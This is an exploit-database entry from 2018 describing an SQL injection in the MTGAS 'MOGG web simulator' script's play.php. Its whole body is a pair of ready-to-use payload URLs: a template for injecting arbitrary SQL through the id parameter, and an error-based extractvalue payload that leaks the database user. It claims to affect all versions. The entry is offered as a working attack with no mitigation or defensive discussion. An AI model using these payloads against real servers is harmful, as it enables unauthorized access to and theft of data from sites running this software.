MTGAS MOGG Web Simulator Script - SQL Injection Vulnerability

2018-10-31T00:00:00
ID 1337DAY-ID-31475
Type zdt
Reporter Meisam Monsef
Modified 2018-10-31T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: MOGG web simulator Script - SQL Injection
# Exploit Author: Meisam Monsef - [email protected] - @meisamrce -
@dorsateam
# Vendor Homepage: https://github.com/spider312/mtgas
# Version: All Version
 
 
Exploit :
http://server/play.php?id=99999'+[SQL Command]+#
http://server/play.php?id=99999%27+and+extractvalue(1,concat(0x3a,user(),0x3a))%23

#  0day.today [2018-10-31]  #